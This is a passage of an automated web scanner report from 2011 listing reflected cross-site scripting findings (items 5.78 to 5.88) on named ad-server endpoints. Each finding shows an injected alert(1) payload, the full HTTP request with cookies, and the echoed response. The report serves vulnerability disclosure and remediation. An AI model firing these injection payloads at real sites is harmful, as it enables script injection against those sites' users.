document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
wX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ24bdb'-alert(1)-'1151e4da4b2&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.78. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98589'-alert(1)-'9f621ba6440 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L98589'-alert(1)-'9f621ba6440&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:47:39 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B62167087%3B4307-300/250%3B41274702/41292489/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L98589'-alert(1)-'9f621ba6440&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2
...[SNIP]...

5.79. http://ad.doubleclick.net/adj/sugarhouseads/house [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sugarhouseads/house

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97926'-alert(1)-'8c7a06cf11f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/sugarhouseads/house;sz=300x250;pos=above;ord=5465695955790579?&97926'-alert(1)-'8c7a06cf11f=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://showadsak.pubmatic.com/AdServer/AdServerServlet?01AD=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ&01RI=20DAA44098E4E6B&01NA=&operId=1&pubId=16437&siteId=16486&adId=11723&kadwidth=300&kadheight=250&kbgColor=FFFFFF&ktextColor=000000&klinkColor=0000EE&frameName=http_ad_doubleclick_netadisugar_tresgallery;nid=16415520;sz=300x250;gid=3019466;pos=above;tile=3;ord=49966komli_ads_frame11643716486&kltstamp=2011-4-11%209%3A56%3A15&pageURL=http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=300x250;gid=3019466;pos=above;tile=3;ord=49966&ranreq=0.6309704261366278&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:01:38 GMT
Content-Length: 522

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/d;231005495;1-0;1;30930003;4307-300/250;42069329/42087116/1;;~okv=;sz=300x250;pos=above;;97926'-alert(1)-'8c7a06cf11f=1;~aopt=2/1/7e/0;~sscs=%3fhttp://www.popsugar.com/15919895?utm_source=sugarnetwork&utm_medium=banner&utm_term=Pop100game&utm_content=300x250&utm_campaign=sugarnetwork_banner_Pop100game_300x250">
...[SNIP]...

5.80. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/community

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7f59'%3balert(1)//fc3d7d07297 was submitted in the pos parameter. This input was echoed as a7f59';alert(1)//fc3d7d07297 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/community;pos=a7f59'%3balert(1)//fc3d7d07297 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blog.zap2it.com/pop2it/2011/05/cannes-film-festival-uma-thurman-jude-law-salma-hayek-and-more-kick-things-off.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 306
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:56:08 GMT
Expires: Wed, 11 May 2011 14:56:08 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/e;44306;0-0;0;15034062;11962-2000/2000;0/0/0;;~okv=;pos=a7f59';alert(1)//fc3d7d07297;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.81. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [rs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/community

Issue detail

The value of the rs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c1a8'%3balert(1)//042cd825ff8 was submitted in the rs parameter. This input was echoed as 4c1a8';alert(1)//042cd825ff8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/community;rs=4c1a8'%3balert(1)//042cd825ff8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/pop2it/video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:52:04 GMT
Expires: Wed, 11 May 2011 15:52:04 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/e;44306;0-0;0;15034062;11962-2000/2000;0/0/0;;~okv=;rs=4c1a8';alert(1)//042cd825ff8;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.82. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [;ptype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/hp

Issue detail

The value of the ;ptype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa86'%3balert(1)//c80a0abda8b was submitted in the ;ptype parameter. This input was echoed as 2fa86';alert(1)//c80a0abda8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/hp;;ptype=2fa86'%3balert(1)//c80a0abda8b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 309
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:50:16 GMT
Expires: Wed, 11 May 2011 15:50:16 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/l;44306;0-0;0;15718924;11962-2000/2000;0/0/0;;~okv=;;ptype=2fa86';alert(1)//c80a0abda8b;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.83. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/hp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82195'-alert(1)-'e068592360b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/hp;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/;ord=85014959?&82195'-alert(1)-'e068592360b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:51:23 GMT
Content-Length: 415

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/l;44306;0-0;0;15718924;31-1/1;0/0/0;u=http://www.zap2it.com/;~okv=;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/;;82195'-alert(1)-'e068592360b=1;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.84. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [dcopt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The value of the dcopt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb7bc'%3balert(1)//6f033fcceaa was submitted in the dcopt parameter. This input was echoed as cb7bc';alert(1)//6f033fcceaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/people;dcopt=cb7bc'%3balert(1)//6f033fcceaa HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 308
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:55:15 GMT
Expires: Wed, 11 May 2011 15:55:15 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/s;44306;0-0;0;36640566;11962-2000/2000;0/0/0;;~okv=;dcopt=cb7bc';alert(1)//6f033fcceaa;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.85. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b330e'%3balert(1)//fe88cd33852 was submitted in the pos parameter. This input was echoed as b330e';alert(1)//fe88cd33852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/people;pos=b330e'%3balert(1)//fe88cd33852 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 306
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:55:03 GMT
Expires: Wed, 11 May 2011 15:55:03 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/s;44306;0-0;0;36640566;11962-2000/2000;0/0/0;;~okv=;pos=b330e';alert(1)//fe88cd33852;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.86. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 146c0'%3balert(1)//ade7a5b4c14 was submitted in the sz parameter. This input was echoed as 146c0';alert(1)//ade7a5b4c14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/people;sz=146c0'%3balert(1)//ade7a5b4c14 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:55:33 GMT
Expires: Wed, 11 May 2011 15:55:33 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/s;44306;0-0;0;36640566;11962-2000/2000;0/0/0;;~okv=;sz=146c0';alert(1)//ade7a5b4c14;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.87. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [rs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/video

Issue detail

The value of the rs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7e74'%3balert(1)//8332e3237ee was submitted in the rs parameter. This input was echoed as e7e74';alert(1)//8332e3237ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/video;rs=e7e74'%3balert(1)//8332e3237ee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/videobeta/watch/?watch=46b4b96c-d010-456a-8c9a-8848a32e31e3&cat=a2b03c2b-b892-4e41-8a2b-c09f9d4d5ff5&src=front
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:56:22 GMT
Expires: Wed, 11 May 2011 15:56:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/n;44306;0-0;0;23181940;11962-2000/2000;0/0/0;;~okv=;rs=e7e74';alert(1)//8332e3237ee;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.88. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da183"><script>alert(1)</script>d968ef71f8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D&da183"><script>alert(1)</script>d968ef71f8d=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh17s3u01m3n050k0p518; rdrlst=4320pahlkze3o0000000g3n05144qlkze3o0000000g3n05157olkxlm50000000o3n0513y7lkze3o0000000g3n0515sklkkpqq000000113n050hsnlkze3o0000000g3n0512nslkxrxz0000000i3n0512gdlkkyy00000000x3n050morlkkxrb0000000y3n0514k6lkxlm50000000o3n050w35lkze3o0000000g3n0513pylkze3o0000000g3n0514rwlkxlm50000000o3n051628lkze3y0000000e3n05132dlkzsmp000000073n0514khlkxlm50000000o3n051196lkkkbe000000173n0513x4lkxrxz0000000i3n0513qmlkze3y0000000e3n051195lkkpqh000000123n051194lkkjj4000000183n0516nulkxlm50000000o3n0513q8lkze3y0000000e3n051193lkkplo000000143n050p46lkkpqq000000113n051192lkkpke000000163n050zg4lkze3y0000000e3n0513qwlkze4r0000000d3n05144elkze3o0000000g3n0510poljyxb40000001j3n050e6llkl0r50000000u3n05106llkzt2k000000063n05138olkxrxz0000000i3n0516dnlkze3o0000000g3n0516y4ll1dpj000000013n01167ulkxq410000000j3n0514qllkxlm50000000o3n05159olk8fax0000001e3n0515halkxlm50000000o3n050m0plkkxrb0000000y3n0516e6lkxnbq0000000n3n0513zblkze3y0000000e3n0514xnlkxlm50000000o3n0516dxlkze3o0000000g3n051391lkxrxz0000000i3n051672lkkxrb0000000y3n0515zhlkze3y0000000e3n050ycrlkncow0000000s3n050okclkze3o0000000g3n05158mlkze3o0000000g3n051015lkze3y0000000e3n0513lelkxrxz0000000i3n0513yolkze3o0000000g3n050ojulkze3o0000000g3n051240lkxrxz0000000i3n0514ozlkxlm50000000o3n0514bmlkxrxz0000000i3n051590lkzsm2000000083n0514j7lkxlm50000000o3n0514bzlkxlm50000000o3n0511pjlkxrxz0000000i3n050p01lkze3o0000000g3n0515holkxlm50000000o3n050m7alkkxrb0000000y3n0513mklkxrxz0000000i3n05101ulkze3o0000000g3n0512zglkxrxz0000000i3n0513lxlkxrxz0000000i3n050zp4lkze3o0000000g3n05148ilkxlm50000000o3n050xvclkze3o0000000